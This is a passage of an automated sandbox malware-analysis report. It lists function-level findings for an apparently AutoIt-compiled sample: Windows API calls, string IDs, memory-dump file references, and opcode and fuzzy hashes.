                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __calloc_crt
                                                                    • String ID: "n
                                                                    • API String ID: 3494438863-3918110435
                                                                    • Opcode ID: 81849414195607481e169afb79fc763f6a5c92e6caeb6f4a2e6c69b8b295ead8
                                                                    • Instruction ID: 5687ab8cb68418e94d29f158b70759bdc3b8b0b55a69f96e531fcd6e028a27d2
                                                                    • Opcode Fuzzy Hash: 81849414195607481e169afb79fc763f6a5c92e6caeb6f4a2e6c69b8b295ead8
                                                                    • Instruction Fuzzy Hash: 0FF0A471A097039EE7149F59BCA27A6679BEF04720B10451EF300CE294EB70C9414699
                                                                    APIs
                                                                    • LoadImageW.USER32(00620000,00000063,00000001,00000010,00000010,00000000), ref: 00624048
                                                                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,006667E9,00000063,00000000,75A90280,?,?,00623EE1,?,?,000000FF), ref: 006941B3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: EnumImageLoadNamesResource
                                                                    • String ID: >b
                                                                    • API String ID: 1578290342-105418645
                                                                    • Opcode ID: e77d0c1804a839880ba4eee2a18f14c5d6047012784bc9f5a6640e53e4f0990a
                                                                    • Instruction ID: 69001317d846932b7dfa14f52acdf389f4fe33bc576d68eff2f4723fab7fc5b4
                                                                    • Opcode Fuzzy Hash: e77d0c1804a839880ba4eee2a18f14c5d6047012784bc9f5a6640e53e4f0990a
                                                                    • Instruction Fuzzy Hash: 9EF0623164039077D7205B15FC86FD63A5B975ABB5F101506F225AE1D0D6F094C09A94
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: 3e1a2dd1f3da624bcab10093df8e76e656f30b900d4e774d786cea3ed7914b8c
                                                                    • Instruction ID: 6d31d92696c436a22a86b2f4826a4e270a1a1d6cc2fa684b8512d91c8c8fa2d3
                                                                    • Opcode Fuzzy Hash: 3e1a2dd1f3da624bcab10093df8e76e656f30b900d4e774d786cea3ed7914b8c
                                                                    • Instruction Fuzzy Hash: BBE09277A0436427D710AAA59C49ECBFBADAB52764F01006AB905D7281E660E6418BD4
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0065A63F
                                                                      • Part of subcall function 006413F1: _doexit.LIBCMT ref: 006413FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: f993d81527c1c5f72d7f81acc64fa7ec5c7cdba88925c837e471d3427f084243
                                                                    • Instruction ID: f368181ac01b3a4aaa211b867bc8d20db738b49ad525685a77eae7bc57f9eb32
                                                                    • Opcode Fuzzy Hash: f993d81527c1c5f72d7f81acc64fa7ec5c7cdba88925c837e471d3427f084243
                                                                    • Instruction Fuzzy Hash: DDD05B313C472833D35536D97C17FC5754B9B16B61F05002ABF0D996C25DE6D98042DD
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0069ACC0
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0069AEBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                    • String ID: WIN_XPe
                                                                    • API String ID: 510247158-3257408948
                                                                    • Opcode ID: 6d851329317c355620dd93232d325f4f6923f5e6d863d54a2bfd0ecc519329e9
                                                                    • Instruction ID: 18ce4ef743dfb8e090a997d894a4e1ba3d824613c1204e124a5474d1765f69df
                                                                    • Opcode Fuzzy Hash: 6d851329317c355620dd93232d325f4f6923f5e6d863d54a2bfd0ecc519329e9
                                                                    • Instruction Fuzzy Hash: E4E06D70C00209DFCF11DBE4D984AECBBFEAB58300F109086E102B6A60CB305A85DF62
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006886E2
                                                                    • PostMessageW.USER32(00000000), ref: 006886E9
                                                                      • Part of subcall function 00667A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: f1d7886e108b1826269b565cd11419ba305bb4ba1d34d61cfb7e4797b780ecff
                                                                    • Instruction ID: 54a308a87b9e1444e0b0635bb7488b13dd9bd30051c49164c6bfe89cab4fe7dc
                                                                    • Opcode Fuzzy Hash: f1d7886e108b1826269b565cd11419ba305bb4ba1d34d61cfb7e4797b780ecff
                                                                    • Instruction Fuzzy Hash: AAD012317853247BF3A87770AC0BFC67A1A9B05B11F111819B746EA2D0C9E0F940CB59
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006886A2
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006886B5
                                                                      • Part of subcall function 00667A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 83f82513a47dcf36c9f10e8947f5ab96b271eb811d59f7f410154b35d257986c
                                                                    • Instruction ID: 58a4254d978236f1b24f92d7630a86ca891b3c3b393445fcea03c9f160d6718e
                                                                    • Opcode Fuzzy Hash: 83f82513a47dcf36c9f10e8947f5ab96b271eb811d59f7f410154b35d257986c
                                                                    • Instruction Fuzzy Hash: 35D01231794324B7F3A87770AC0BFC67A1A9B05B11F111819B74AEA2D0C9E0F940CB54